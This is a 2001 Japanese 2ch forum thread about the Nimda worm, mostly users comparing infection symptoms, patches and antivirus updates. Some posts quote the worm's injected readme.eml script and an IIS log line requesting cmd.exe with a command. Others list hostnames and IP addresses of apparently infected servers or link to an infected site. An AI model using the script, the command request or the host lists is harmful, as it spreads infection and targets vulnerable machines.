文字列で検索してないか?
ファイル名で検索するんだぞ。

139 :名無しさん@お腹いっぱい。:01/09/19 18:31
Windows Update行ったら、
なんか英語書いてあるんですが、おいら英語読めません。
どうすればUpdateできますか?

140 :名無しさん@お腹いっぱい。:01/09/19 18:31
>>102
それデフォルトです
windows2000はもとからそうなってます。

141 :名無しさん@お腹いっぱい。:01/09/19 18:32
>>137 ありがと〜

142 :136:01/09/19 18:33
>>138
は!そ、そうなのか…アホすぎる、私。

143 :コピペ厨房:01/09/19 18:35
>>112

>>EXEファイル書き換えるなんて 信用できないし。困ったもんだ。
>>http://www.nai.com/japan/virusinfo/virN.asp?v=W32/Nimda@MM



つーか、まかふぃーが信用できない。ホントに困るよ。 >>114

McAfeeウィルス対策をコピペでぱくる
http://slashdot.jp/article.pl?sid=01/08/21/0428210





こんなのがこんな時期に急に出るなんて、以前の版は・・?
「ウイルススキャン」のオンライン版 2001.9.7発売
http://www.sourcenext.com/products/vsonline/

売ってるの特打の会社だしさ。

144 :名無しさん@お腹いっぱい。:01/09/19 18:36
>>143 いや実際に書きかられてる人いるだろ。べつにMcAfeeが
どうって話じゃないよ。

145 :名無しさん@お腹いっぱい。:01/09/19 18:38
>>144

そんな会社信用できる? 今回もここが一番対応対応遅かったし。

146 :名無しさん@お腹いっぱい。:01/09/19 18:39
>>102
102の書き込み見てから俺もチェックしてみた
結果だが、全く同じ症状だよ
俺も感染してるっぽい
readme.exeでwinフォルダを検索したが見付からず
名前が変わったるのだろうか?

あと、俺はwin2000ユーザーだ。ちと気になってログインのアカウントを調べてみたら
アドミンとゲストが1個ずつ増えてた(;´Д`)
しかも消せないし(;´Д`)
どうしましょう!?

147 :名無しさん@お腹いっぱい。:01/09/19 18:41
>>146

そのゲストアカウントにパス無しでログイン出来たら完璧にアウト!

148 :名無しさん@お腹いっぱい。:01/09/19 18:42
>>140
ってデフォルトでそうなってたの?
鬱だ

149 :名無しさん@お腹いっぱい。:01/09/19 18:44
146さんは勘違いをしているのと思われます。





         ・・・W2K使う人はもちっと勉強して欲しい(ボソッ

150 :あひ:01/09/19 18:46
>>146
ADMIN$は普通あるだろ、、。

151 :名無しさん@お腹いっぱい。:01/09/19 18:46
AdministratorとGuestが増えてたってのはおかしいよな?

152 :名無しさん@お腹いっぱい。:01/09/19 18:47
これを機会に、関係ない不具合も発見&解消!
な人々が多いと思われ。

いいことだ。

153 :92:01/09/19 18:46
>>131
だから・・・・ガセを流すなよ!
感染した自分自身を共有設定するが、どうやって他のパソコンまで共有化するんだよ!
IISの穴を経由して、IIS稼動中のNTや2Kは共有されるけど、普通の98/Me系は無理だろ〜

154 :名無しさん@お腹いっぱい。:01/09/19 18:49
win MeユーザーでIEは5.50.4134.0100なんですけど、SP2にしたほうがいいんですか?

155 :名無しさん@お腹いっぱい。:01/09/19 18:50
>>154
したほうがいい、っつうより、今すぐしろ!

156 :あひ:01/09/19 18:50
>>153
A〜Zドライブ全部スキャンするらしいから、感染したマシンに共有されてるマシンはヤバイよね。

ネットワークコンピュータを見にいったりはしないんだろうか、、、。

157 :名無しさん@お腹いっぱい。:01/09/19 18:51
>>153 >>9-11とはケースが違うの?

158 :名無しさん@お腹いっぱい。:01/09/19 18:52
いや、10と11は関係ないから。

159 :157:01/09/19 18:52
>>9>>12だ。すまぬ。

160 :名無しさん@お腹いっぱい。:01/09/19 18:53
>>157-158
ワラタ

161 :名無しさん@お腹いっぱい。:01/09/19 18:55
鯖に対策はしてるが、トラフィックを食われてどもならんので、
第一オクテットが同じネットワークからのhttpを遮断決定。

すきーりしたよ。時々来るがな。

162 :IE6.0だから心配なし:01/09/19 18:58
>154
IE6.0の方がIE5.5sp2より軽いよ
http://www.microsoft.com/japan/ie/

163 :92:01/09/19 18:58
>>157
既に共有化してたらネットワーク経由で感染するが、>>131が書いているように、勝手に他のパソコンを共有化して社内LANが一気に感染する事はない。

感染したパソコンがLAN経由で既に共有化されているパソコンへ感染→○
感染したパソコンがLAN経由で他のパソコンを共有設定し感染→×

きっと>>131の会社は全てのパソコンが共有設定されているか・・・
金持ちなんでWin2KでIISを導入済だと思われ(w

164 :名無しさん@お腹いっぱい。:01/09/19 19:00
>>163 なるほど。納得。ありがと。

165 :初心者11:01/09/19 19:01
ネスケをとりあえず使ってたら大丈夫ですか?

166 :名無しさん@お腹いっぱい。:01/09/19 19:02
EXEの書換え問題はどうなんだろ。これが一番問題だ。
感染した人EXEをバイナリファイルで開いて、みてくれないかな。
今朝、ニュース速報のスレでヘッダーになんか書き込まれてるって
人がいたが。

167 :名無しさん@お腹いっぱい。:01/09/19 19:02
うちはIE4.0sp2いれてるけど関係ないのかな?
MSの技術情報読むと

>影響を受けるソフトウェア :
>Microsoft Internet Explorer 5.01
>Microsoft Internet Explorer 5.5

てあるのだが。。。どうなんでしょうか?

168 :名無しさん@お腹いっぱい。:01/09/19 19:05
IE5とIE55の場合はSP2をあててないとEXEファイルを自動実行してしまうということでしょ?
他のブラウザでもダウンして実行すれば同じことかと。

169 :名無しさん@お腹いっぱい。:01/09/19 19:05
メールで感染した場合は、IEのverに関係ないみたい。
うちの会社でIE5.0でNimdaに感染した人がいた。

170 :名無しさん@お腹いっぱい。:01/09/19 19:06
ヴァージョンは5.50.4134.0100だから
www.microsoft.com/windows/ie/download/critical/Q290108/default.asp
から修正プログラムをダウンロードして開こうとしたら
「必要ありません」って出たんだけど何で?

171 :名無しさん@お腹いっぱい。:01/09/19 19:06
うちのパソコンで含まれる文字列「Administrator」を検索したら一杯出てきたんですが。

172 :名無し募集中。。。 :01/09/19 19:07
http://61.208.221.9/

173 :167:01/09/19 19:07
>>168
たしかにそうですね。
納得、ありがとうございます

174 :名無しさん@お腹いっぱい。:01/09/19 19:07
>>143
>「ウイルススキャン」のオンライン版 2001.9.7発売

俺、無償アップデートの対象だったから入れてみたよ。
Nimdaに感染してるページを見に行ったら、表示しようと
した時にちゃんとNimdaを検出してくれたよ。
(もちろん最新のDATにしてからね)
ダウンロードが開始される前に駆除可能だった。
ご参考まで・・・

175 :初心者11:01/09/19 19:08
>>168
ネスケでもダウンロードしなければ大丈夫ってことですよね
ありがとうございました

176 :146:01/09/19 19:08
>>149
勉強不足でスマソ…
今回の件で自分がいかに無知だって事が分かったよ
勉強しぃょぅ・・・

しかし、何でアカウントが増えてるんだろう
作った覚えなし。これも最初からついてるのかな?

177 :名無しさん@お腹いっぱい。:01/09/19 19:09
>>171
システム関連のファイル内にデータとして含まれる文字列の中から
Administrator(管理者)なんて検索したら大量に出てくるにきまってる。

178 :名無しさん@お腹いっぱい。:01/09/19 19:09
>>175
添付ファイルつきのメールは開かないようにな。

179 :92:01/09/19 19:09
>>166
同意
俺もそれが知りたい
但し、iniの書換え内容だけで判断すると他のexeへ感染しなくても十分感染力はあるから余計な事はしてないと願うだけだが・・

今、テストで感染出来る環境が無いんで試せない。

180 :初心者11:01/09/19 19:11
>>178
はい、感謝

181 :名無しさん@お腹いっぱい。:01/09/19 19:11
昨日MSN見たとき「DLしますか?」みたいなウインドウでて
キャンセルしたんだけど、今日NortonのLiveupdateしてから
スキャンしたらNimdaに感染してるってでちゃった。
IE5.01SP2にしてたのに〜〜!

Nortonで検出されたReadme[1].emlは
C:\WINDOWS\Temporary Internet Filesにあったんだけど
これってやっぱ感染してるんだよね。。。
削除したけどもう無駄だよなぁ。ショックでけぇ。

ちなみに、隣にLAN組んでるPCが二台あるんだけどそっちは感染してなかった。
ZoneAlarmいれてあったからかな。
(ZoneAlarmが起動してるとネットワークコンピュータで相手のPCが見えない)

182 :名無しさん@お腹いっぱい。:01/09/19 19:11
うちはバージョン5.00だ。とりあえず今の所は感染してないみたい。
でも気をつける。(アクチブエックスや、ジャバスクリプトは切ってる)

兄はIEが使えなくなって、ネスケになってる。
2chのこのページ見せたら青くなってました。

そういえばヤフオクでメールやり取りした人で
白紙のメールに変な添付ファイルの人がいたんだけど
キモイから即削除して、「あなたのメールが読めません」みたいな
返事を送ったんだけど(ウチはベッキーなんで)
あの人もウィルスかかった人なのかしら?

183 :(´Д`;):01/09/19 19:11
書いたのウイルスマニア。詳しい奴だね。色んなウイルスのおいしいところ盛り込んでる。
ってーか、パッチ、マメに当てとけばなんてこと無いわけでしょ。
決して新しいバグ突いてる訳じゃないんだし。
クライアント君一番気になる不正なMAIMEヘッダなんて、かなり前じゃん。X-WAVE。
サンプルコード公開してたサイトなんか報告された当初、目茶混んでた。
1週間後にやっと落せたよ。
当初のサンプルコード自体は、ウイルスバスターに引っかかったけど。
・・・添付ファイルや本文、WTC関係のシンパシー求める奴なら尚・・・。

184 :名無しさん@お腹いっぱい。:01/09/19 19:12
他の実行ファイルに感染する機能もあるのか?

185 :名無しさん@お腹いっぱい。:01/09/19 19:15
>>181
EXEファイルをダウソしていなければ大丈夫じゃないの?

186 :名無しさん@お腹いっぱい。:01/09/19 19:15
IE5.5SP2にアップデートするとき最小限のコンポーネントで大丈夫?

187 :名無しさん@お腹いっぱい。:01/09/19 19:15
>>186
セキュリティパッチは最小限に含まれるからOKなはずだぞ。

188 :名無し:01/09/19 19:16
サーカムの機能はなぜ入れなかったのだろうか?

189 :名無しさん@お腹いっぱい。:01/09/19 19:16
>187
ありがとう。

190 :名無しさん@お腹いっぱい。:01/09/19 19:16
ゾヌアラームって、
実は、効果があるのか無いのかもよくわからないまま
(私は社会人なのに、英語力もネット知識も厨房以下の能力なので)
2chのビジネスソフト板で誉められてたから入れていたんだけど
ちゃんと役に立ってくれてたんだ! ビクーリ。

オミトロンもダウンロードしたけど、こりは使い方がわからんので
使ってない。

191 :名無しさん@お腹いっぱい。:01/09/19 19:17
『*.eml』で検索→8つヒット
『readme.exe』で検索→なし
『MEP51B3.TMP.EXE』で検索→なし
『Nimda』で検索
→1つヒット
 名前 troj_nimda[1]
 フォルダ名 C:WINDOWS\Temporary Internet Files\Content.IE5\EJYZV12C
 サイズ 15KB
 ファイルの種類 Microsoft HTML Document 5.0

これは感染してるってことですか…?
WIN98でIE5.0です。

192 :名無しさん@お腹いっぱい。:01/09/19 19:17
>>181 >>184
ダウンロード確認のダイアログボックスが出た時点で、
勝手にキャッシュされてるとおもわれ。

193 :名無しさん@お腹いっぱい。 :01/09/19 19:19
>>152
正直、俺も関係ないADMIN$のファイル共有を発見&解消できた厨房だ。

194 : :01/09/19 19:20
>>191
C:WINDOWS\Temporary Internet Files\Content.IE5\EJYZV12C
コれは、キャッシュ。ココに有るってことは、そのページ開いてる
訳だ。。
感染してるかどうかなんてわからん。パッチ当ててあるか解らんし。

195 :名無しさん@お腹いっぱい。:01/09/19 19:21
>>191
感染してないだろ。

>>192
それがセキュリティホールってことかね?
そこから実行までのプロセスがわからんが…

196 :名無しさん@お腹いっぱい。:01/09/19 19:22
いいからキャッシュ消せ

197 :名無しさん@お腹いっぱい。:01/09/19 19:23
勝手に実行するのが穴だろ。

198 : :01/09/19 19:24
ノートンINS+IE5.5SP2

スキャンしたところ「ニダ」に感染してた。

恐らく、感染したサイトの履歴に反応したものと思う
同じ症状の方いますか?

199 :名無し:01/09/19 19:25
さらに驚くべき機能が明らかに

http://headlines.yahoo.co.jp/hl?a=20010919-00000001-wir-sci

200 :名無しさん@お腹いっぱい。:01/09/19 19:25
そもそもelmファイルの役割とはなんですか?

201 :名無しさん@お腹いっぱい。:01/09/19 19:25
だ か ら !
感染したらどうすりゃいいんだよ!

202 :名無しさん@お腹いっぱい。:01/09/19 19:26
>>197
それならキャッシュされただけでは何も起きないよな?

203 :名無しさん@お腹いっぱい。:01/09/19 19:27
>>199
すげー。まさに全機能網羅って感じだな。

204 :_:01/09/19 19:27
うちの鯖に残ってたログより、2000厨リスト。.jp のみ。
ここ見るときは気をつけてね。

28 alr83sv1.wky.go.jp
7 asia00.adsp.or.jp
9 d2c67dd7.t-net.ne.jp
28 dbsearchsv2.kyoto-archives.gr.jp
3 dns.psa.gr.jp
98 dns1.mfl.co.jp
5 dns1.nskkk.gr.jp
15 dnsocn.nishida.co.jp
3 ftp.netkobe.gr.jp
14 himika-gw.himika.co.jp
7 imorine70.sg-jc.ac.jp
14 kfpc.knowledge-f.co.jp
30 lab.kdn.co.jp
93 mailserver.joypack.co.jp
14 mexnt4.mex.trans-cosmos.co.jp
14 n01-075.e-tokyo.highway.ne.jp
119 ns.dmn.co.jp
14 ns.ins.co.jp
5 ns.netkobe.gr.jp
1 ns.sysman.co.jp
14 ntsegb-unused-210-172-132-042.interq.or.jp
73 pc2.perlite-unet.ocn.ne.jp
4 pop.netkobe.gr.jp
38 qns.shirai-law.gr.jp
44 s8638ks0.kdn.co.jp
29 s9771114.kdn.co.jp
158 server.tsubame-library-unet.ocn.ne.jp
14 siu-s005.suzuka-iu.ac.jp
1 smtp.netkobe.gr.jp
14 t-net.tamano.or.jp
14 www.akis.co.jp
17 www.asoyoho.co.jp
1 www.netkobe.gr.jp
14 www.prland.co.jp
14 www01.orico.co.jp
48 www2.kdn.co.jp

すげー数や。

205 :名無しさん@お腹いっぱい。:01/09/19 19:29
>>201
回線切れ。

206 :名無しさん@お腹いっぱい。:01/09/19 19:29
>>202
readme.exeファイルまではdecodeされてるみたいだけどな。
<NAVのメッセージ見てると

207 :181:01/09/19 19:29
>>192
キャッシュされてるだけだったら大丈夫ってことでしょうか?

208 :  :01/09/19 19:30
>>205
禿げしく同意。

209 :名無しさん@お腹いっぱい。:01/09/19 19:30
>>205
回線切るしかないのかよ!

210 :名無しさん@お腹いっぱい。:01/09/19 19:32
回線切ってワクチンソフトが除去に対応するまで待つ

211 :名無しさん@お腹いっぱい。:01/09/19 19:32
>>207
IEにパッチが当たっているのなら大丈夫なので、
キャッシュを消してしまいましょう。

212 :181:01/09/19 19:33
>>207
よかった!!!(涙)
いろいろ調べたんですけどあのキャッシュ以外怪しいのは
なかったので大丈夫そうですね。
キャッシュは消しました。ありがとうございました。

213 :191:01/09/19 19:34
とりあえず安心しました。
IE5.5 SP2にアップしてきます。でも注意ってことですよね>>78

214 :名無しさん@お腹いっぱい。:01/09/19 19:34
間違い、回線と電源切れ。

215 :(´Д`;):01/09/19 19:35
不正なmimeヘッダ関係ならここにある。nimdaの一般ユーザ用?の穴ね。
日本語サイト。
//isweb27.infoseek.co.jp/computer/zaddik/
サンプルコード、有るけど興味本位では実行しない方が良いよ。
パッチ当たってないと、プロンプト表示されてコード走ったような気がする。
春頃の話しだし、覚えてないよ(w
2ksp1だった。SP2なら問題なし。

216 :名無しさん@お腹いっぱい。:01/09/19 19:35
>>213
まあ怪しいファイルはDLしないし実行しないことだ。
「割れず」なんて言葉で検索してるやつは無理だろうが…

217 :名無しさん@お腹いっぱい。:01/09/19 19:36
symatec英語版より抜粋
http://www.sarc.com/avcenter/venc/data/w32.nimda.a@mm.html

The worm then attempts to modify files with the extension .htm,
.html., and .asp or filenames matching default, index, main and
readme on the local system that are shared with other network
computers. .EXE files are infected and .EML and .NWS files
are replaced by the virus.
やっぱ書換えまくりですね。やばい。英語力自身ないので間違って
たらスマン。

218 :名無しさん@お腹いっぱい。:01/09/19 19:37
アップデート出来ない…ダウンロードしている途中で
止まってしまう。もしかして混んでる?

219 :名無しさん@お腹いっぱい。:01/09/19 19:37
で、駆除法は?

220 :名無しさん@お腹いっぱい。:01/09/19 19:38
>>212
admin.dllが無いか確認しとけ

221 :名無しさん@お腹いっぱい。:01/09/19 19:38
>>219
各ウィルス駆除ソフトが対応するのを待つ。
手動で駆除しようなんて無茶だ。

222 :不可和:01/09/19 19:39
VirusScan5.1がBekcyに対して過剰に反応します。
<html><script language=”JavaScript”>window.open(”readme.eml”, null,”resizable=no,top=6000,left=6000”)</script></html>
を半角にしてメールを送ると
ウイルス検出って騒ぎ出します。
おかげさんでメールが一部紛失。

223 :名無しさん@お腹いっぱい。:01/09/19 19:39
駆除方法はまだわかってないそうです。
とりあえず感染したのがわかったらPCの電源切って
つながないほうがいいとのこと。
駆除方法がわかるまで待つしかないようです。

224 :名無しさん@お腹いっぱい。:01/09/19 19:40
>>220
admin.dllはあってもいいんじゃないか?
日付の新しいのがあったらダメだってことか?

225 :名無しさん@お腹いっぱい。:01/09/19 19:40
SP2インストールしようとすると
「前回のアップデートが完了してません。完了してから
 行ってください。」って出るんですけど。
身に覚えがまったくありません。
誰か教えてください。

226 :名無しさん@お腹いっぱい。:01/09/19 19:41
SP2ダウンロードしようと思ったけどダイヤルアップであの容量はきつい。
問題の部分だけ修正する軽いやつでないかなぁ。

227 :名無しさん@お腹いっぱい。:01/09/19 19:41
>>225
どこだかにセットアップ続行の実行ファイルがあると思うんだが…
どこだったかな?

228 :212=180:01/09/19 19:41
>>220
admin.dllはありませんでした。
それと、HDD内のHTMLファイルが改ざんされるようですが
今自分のPCで再編集したHTMLファイルをWEBスペースに
アップして、他の感染してないPC(IE5.5SP2)でみたところ、
何もでてこなかったので大丈夫そうです。
親切にどうもありがとうございました。

229 :名無しさん@お腹いっぱい。:01/09/19 19:41
>>225 TEMPフォルダにゴミがあるのかもしれない。

230 :名無しさん@お腹いっぱい。:01/09/19 19:42
>>217 これで*.EXEファイル書換え決定?

231 :名無しさん:01/09/19 19:42
Nimda って Code Red II との相乗効果が考えられるから恐いよね。僕の管理
している web server では、Nimda の出現と同時に Code Red II の攻撃件数
が増えてる…… >>54 さんが同じこと書いてたけど。

232 :名無しさん@お腹いっぱい。:01/09/19 19:43
>>217

日本語情報ではMcAfeeが素早い模様。

http://www.nai.com/japan/virusinfo/virN.asp?v=W32/Nimda@MM

コピペと翻訳はおまかせっ(w

233 :名無しさん@お腹いっぱい。:01/09/19 19:43
digidon.orico.co.jp
なんて所からまだ来る。
デカプリオ助けて!

234 :名無しさん@お腹いっぱい。:01/09/19 19:44
>>232 たしかに(笑) だがMcAfeeは信用ならんらしいので
一応信用できるソースをと思ってね(笑)

235 :名無しさん@お腹いっぱい。:01/09/19 19:44
NimdaってIISのセキュリティーホールの対策パッチを入れているサーバーには
感染しないんだよね?
ということはMSNはこのパッチ入れてなかったってこと?
もしそうなら空いた口がふざがらない。

236 :名無しさん@お腹いっぱい。:01/09/19 19:46
>>235
クラックされたんじゃないのかな?

237 :名無しさん@お腹いっぱい。:01/09/19 19:48
>>236
あまり詳しくないのでよく分からないけど、要するに普通のサーバーの
感染の仕方とは違う方法で感染したってこと?

238 :名無しさん@お腹いっぱい。:01/09/19 19:48
システムファイルとかEXEとかファイル書換えるってことは、
感染したら最後ってことか。怖いね。

239 :名無しさん@お腹いっぱい。:01/09/19 19:48
>>235
ウェブサーバーを共有設定してあったんだろ(w

240 :名無しさん@お腹いっぱい。:01/09/19 19:49
おいらは、シマンテックに感動した。
夜を徹しての解析作業。少しずつ更新されていくページ。
ノートン2002購入決定デス

241 :220:01/09/19 19:51
>>227
すみません、是非セットアップ続行実行ファイル教えてください。

>>229
ゴミってどれのことでしょうか?

242 :名無しさん@お腹いっぱい。:01/09/19 19:52
マカヒーは信用ならん!という皆様にシマソテックのページより。

http://www.symantec.com/region/jp/sarcj/data/w/w32.nimda.a@mm.html
>最後に、ワームは感染システム上のMMC.EXEのような正当なファイルをワームで上書きしてしまいます。

凶悪ですねえニムタン。

243 :名無しさん@お腹いっぱい。:01/09/19 19:53
>>239
そっちかもしんないなぁ。
実行ファイルが共有されてて、その実行ファイルに感染されたのを
知らないで実行しちゃったら感染するもんねぇ。

244 :(´Д`;):01/09/19 19:54
>>241
ブラジャーのキャッシュ。

245 :名無しさん@お腹いっぱい。:01/09/19 19:54
>>235
そのとおり、結構古いバージョンのIISを使っていたみたい。
あっぽ〜ん!
しかも、終戦記念日にクラックされて、1月間気づかなかったというおまけ付き。
あっぽ〜ん!

246 :名無しさん@お腹いっぱい。:01/09/19 19:55
14時から19時までに4000発以上
Ave.800発/H
ってことか

247 :名無しさん@お腹いっぱい。:01/09/19 19:55
>>241
Windows Update Setup Files とかいうディレクトリないか?

248 :235:01/09/19 19:55
いずれにしろMSNが”パッチ入れ忘れてました。”とコメントすることは、
考えにくいから、本当のところは担当者しか分からんな・・

249 :名無しさん@お腹いっぱい。:01/09/19 19:56
>>245
それが日付って言ってたやつか…

250 :意味無しボッキー:01/09/19 19:56
ニムダに感染するようなやつはパソコン使うなニダ!!

251 :235:01/09/19 19:57
>>245
248を書いたあとに見た。
どこかにソースある?

252 :名無しさん@お腹いっぱい。:01/09/19 19:57
このソースがページの末尾に付加されてるのがNimdaなの?
<html>
<script language="JavaScript">window.open
("readme.eml", null, "resizable=no,top=6000,left=6000")
</script></html>

BlackIceにアタックの跡があったんで辿ってみたんだ。

253 :名無しさん@お腹いっぱい。:01/09/19 19:58
ノートンAVの定義ファイル、
18時半にLive Updateしたばかりなのに、
今繋いだらまた更新されとる・・・

254 :_:01/09/19 19:58
>>233
あといけてるところでは
alr83sv1.wky.go.jp - - [19/Sep/2001:XX:XX:XX +0900] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 299
なんてのもあった。

255 :名無しさん@お腹いっぱい。:01/09/19 20:02
>>251
感染してるときのMSNのトップページなんか誰かミラーしてないのかな?

256 :名無しさん@お腹いっぱい。:01/09/19 20:04
HP見ただけで感染なんて、恐ろしい。
IE5.5のアップデートやノートンAV、まめに最新にしておいてよかった。
過去ログみて感染しているHP試しにアクセスしたら、
ノートンAV君が警告だしたよ。
今だに感染したままのHPあるから、怖いね〜。

257 :名無しさん@お腹いっぱい。:01/09/19 20:05
>>252
IISに感染するとそのスクリプトをHDD内のhtmlファイルに追加しまくる。
で、その改竄されたページを見ると"readme.eml"がダウンロード。

258 :名無しさん@お腹いっぱい。:01/09/19 20:05
どっかに逆汗さらたもの無いですか?
ndisasmwかけてみたけど、これじゃサパーリです。

259 :名無しさん@お腹いっぱい。:01/09/19 20:06
ウィルスバスターは、対応済みです。
■ ソリューション
トレンドマイクロ製品ユーザ様向けソリューション
パターンファイル941以降、検索エンジン5.200以上で対応しています。
(最新パターンファイル・検索エンジンのご使用をお勧めします。)
現在ウイルス対策製品をご使用でないお客様向けソリューション
トレンドマイクロ社ホームページより、30日間有効期間中フル機能で
ご使用できる「ウイルスバスター2001」体験版をダウンロード、
検知した場合手動削除手順にて削除してください。
トレンドマイクロ社ホームページより、
「ウイルスバスター オンラインスキャン」にて
マシンのウイルスチェックを実行し、
検知した同様に手動削除してください。

http://www.trendmicro.co.jp/virusinfo/troj_nimda.htm

260 :235:01/09/19 20:07
>>255
ソースってのは情報の出どころのURLってことね。
自分の良く行く板では普通に通じてたから紛らわしい表現使ってしまった。
スマソ。

261 :名無し募集中。。。 :01/09/19 20:07
http://61.208.221.9/

262 :名無しさん@お腹いっぱい。:01/09/19 20:08
>>260
違う違う。
ソースはそのトップページを見た人が日付に気づいたって書き込みだと思うってことよ。
news板じゃねーか?

263 :252:01/09/19 20:09
>257
説明ありがとう。

264 :名無しさん@お腹いっぱい:01/09/19 20:10
スキャンしようとするといきなり強制終了。
何度やっても!!
こんな説明がでました
SCAN32 のページ違反です。
モジュール : MCSCAN32.DLL、アドレス : 0167:004d103f
Registers:
EAX=00000000 CS=0167 EIP=004d103f EFLGS=00010206
EBX=00000000 SS=016f ESP=0407d1b0 EBP=0407d780
ECX=000000af DS=016f ESI=00000000 FS=375f
EDX=0000001c ES=016f EDI=03dfcad6 GS=36be
Bytes at CS:EIP:
8b 08 ff 51 1c 39 c2 76 04 31 c0 eb 54 83 7c 24
Stack dump:
000000af 0407d7b6 00000000 0407dc20 004da228 00000000 03df019c 0407d798 ba89c888 5048cc82 a282c982 c482c182 f182c793 6383c582 8b835b81 4c44f082

265 :名無しさん@お腹いっぱい。:01/09/19 20:11
>>261
いやん、要注意だね。
SP2に代えてたから助かった。

266 :MSN氏ね:01/09/19 20:12
134 名前:MSN広報部 投稿日:01/09/19 19:33
http://help.msn.co.jp/notice.htm
ご質問とご回答
Q.自分の会社のサーバーが被害にあった。MSN からの攻撃が原因ではないか。

A. MSN ではサーバーが直接マイクロソフト社外のサーバーに対して影響を及ぼしたことはないと考えています。
MSN のインターネット上に開いたサーバーは、サーバー機能ではなくそのコンテンツファイルが 9/18 の夜 11 時以降
1 時間ほど感染した状態にありましたが、これにより影響を受けたのは直接このサーバーにアクセスした利用者の
コンピュータになります。なお、利用者のコンピュータが感染するには、ブラウザのバージョンなどいくつかの条件が
そろった場合に限られます。

267 :名無しさん@お腹いっぱい。:01/09/19 20:13
IE55SP2 VB2001パターン941の武装でしたが
ある個人のページで地雷を踏んでしまいました。
すぐさまVBが反応して、「隔離成功」とのメッセージが出ました。
これって、「アウト」「セーフ」?
どうしたらよいでしょうか??

268 :  :01/09/19 20:15
>>267
セーフ!

269 :名無し:01/09/19 20:17
あちこちでパニック状態です。

270 :名無しさん@お腹いっぱい:01/09/19 20:17
>>261
踏むなよ!!!!
感染するぞ。

271 :名無しさん@お腹いっぱい:01/09/19 20:20
>>261
いまやウイルスは日本だけの法律で裁かれるのではない。
FBIなんかが捜査したりしてるんだぞ。
不用意にリンク張るのは貴方にとって危険な行為だ。

272 :名無しさん@お腹いっぱい。:01/09/19 20:22
昨日、MSN開いたら勝手にもうひとつタスクバーが開いて、その後
メディアプレーヤーが起動しました。もちろんプレーヤーは
そんな形式のファイルは再生できませんと、エラーになったのですが・・・
これってOUTですか?
ちなみに今日、ファイル検索したところreadme.exeはなし、
.emlはキャッシュにのみ存在していました。

273 :264:01/09/19 20:23
まじで頼みますYO!

274 :変化なし:01/09/19 20:24
>>255
>>>251
> 感染してるときのMSNのトップページなんか誰かミラーしてないのかな?

見た目はかわらんよ。
ここで表示されたとこに行くと最新の感染サイトに行かれる。
http://search.fresheye.com/?kw=readme%2eeml&term=weekly


むしろ、これミラーして永久に藁いものにしたらどうかな。
http://help.msn.co.jp/notice.htm

275 :名無し:01/09/19 20:24
IE6正式版が登場

http://www.microsoft.com/japan/ie/

276 :名無しさん@お腹いっぱい。:01/09/19 20:25
>>275

これで にむだサイト開くとどうよ?

277 :マジ史んでいいよ >>MSN:01/09/19 20:28
>>266
それ、別に嘘が書いてあるわけじゃないけど、
読むと頭にくるよな。

ほんと、逝っていいよ >>MSN

278 :名無しさん@お腹いっぱい。:01/09/19 20:29
このガッコかっこわりぃ・・。

http://www.takara-univ.ac.jp/fifty/

感染してるのにトップ消しただけで感染されっぱなしだよ・・。

279 :助けてください。:01/09/19 20:30
5.00 SP2の人は5.01 SP2にしないとマズイの?
Win2K使用してるんだけど…
以前Win2K SP2をあてただけで…

280 :名無しさん@お腹いっぱい。:01/09/19 20:30
203.48.111.122
203.49.88.225
203.5.192.203
203.55.8.1
203.55.94.17
203.56.41.2
203.58.208.228
203.59.56.10
203.62.158.7
203.67.11.23
203.67.122.246
203.67.161.91
203.67.165.1
203.67.52.173
203.67.74.60
203.69.109.219
203.69.120.168
203.70.124.93
203.70.131.252
203.74.99.202
203.75.139.11
203.79.148.119
203.79.211.251
203.79.224.12
203.8.88.224
203.85.132.193
203.86.100.129
203.86.100.236
203.89.197.66
203.89.235.10
203.93.167.55
203.93.219.163
203.93.245.144
203.97.10.171
203.97.231.254
210.50.122.195
211.21.132.17
61.219.239.252

281 :  :01/09/19 20:30
>>278
貼るなって(w

282 : :01/09/19 20:32
キャッシュにreadme.emlとw3.nimda.a@mmがはいってた俺は死んでる?
ノートン先生の検索だとなにも引っかからなかったし何がなんだかわかりません

283 :   :01/09/19 20:33
>>282
ウイルス定義は最新になってる?なってれば引っかかると思うが

284 :名無しさん@お腹いっぱい。:01/09/19 20:33
Sony から Nimda 君がきた(藁

285 :名無しさん@お腹いっぱい。:01/09/19 20:35
readme.eml
ってファイルの状態はMIMEで包まれてるからまだ平気。
これをダブルクリックしたりすると、解凍されてreadme.exeが
出てくる。
IE5でSP2のパッチが当たっていない場合、ダブルクリックしないでも
readme.exeが溶け出して感染する。
ってことかいな。

286 :名無しさん@お腹いっぱい。:01/09/19 20:35
>>283
>>>282
> ウイルス定義は最新になってる?なってれば引っかかると思うが

んだ。きのう更新してても、きょうもやらないとダメだぞ。

287 :282:01/09/19 20:38
readme.emlを見つけた瞬間に削除しちゃって
その後にアップデートされてる事に気づいて更新して検索しました
やっぱりreadme.eml入ってた時点でアウトかな…

288 :名無しさん@お腹いっぱい。:01/09/19 20:39
>>279

5.00SP2なんて存在しない。
Win2000にSP2あてたのなら、IEも5.01SP2になっている。

289 :名無しさん@お腹いっぱい。:01/09/19 20:41
IISが稼動してたサーバーが感染して場合はどうすればいいの?
とりあえず今は線を抜いて隔離してるんだけど。

290 :名無しさん@お腹いっぱい。:01/09/19 20:41
readme.eml入ってるだけでは感染してないと思う。
感染したらreadme.emlをファイル名変えてコピーしまくる。
LAN内のネットワーク共有フォルダにも。

291 :名無しさん@お腹いっぱい。:01/09/19 20:44
実行したり自動実行されてたりしたら知らんが。

292 :名無しさん@お腹いっぱい。:01/09/19 20:45
モロに感染したPCをアンチウイルスで除去したんだけど、
ほんとに除去されてる?
DLLを書き換えられてるのも戻るってこと?

293 :名無しさん@お腹いっぱい。:01/09/19 20:46
マイクロソフトのサイトいったら
ファイル名欄にreadme.exeと出たメディアプレイヤーが
立ち上がりました。

ノートンでしらべてら感染しとりました

294 :名無しさん@お腹いっぱい。:01/09/19 20:55
つか、感染マシンにウィルス定義ファイルてどやって取り込めばいい?
感染してるからネットワークにつなげないし。
3分以内ならセーフ?

295 :名無しさん@お腹いっぱい。:01/09/19 20:55
実行ファイル見たら、後ろの部分に色々細工されてた。
ファイルの中身を readme.eml で検索して、実行ファイル名が1000個以上
でてきた。復旧にどれだけかかるんだろう・・・・

296 : メールに無反応:01/09/19 20:58
アタック先、判る範囲でメールしても管理者ってあまり読んでないのね。
で、そのIISサイトのページみても、ニムダ以前の改竄が既にあったりして笑わせてくれる。
で、ネットワーク事業者ってのが結構多いな。(ワ
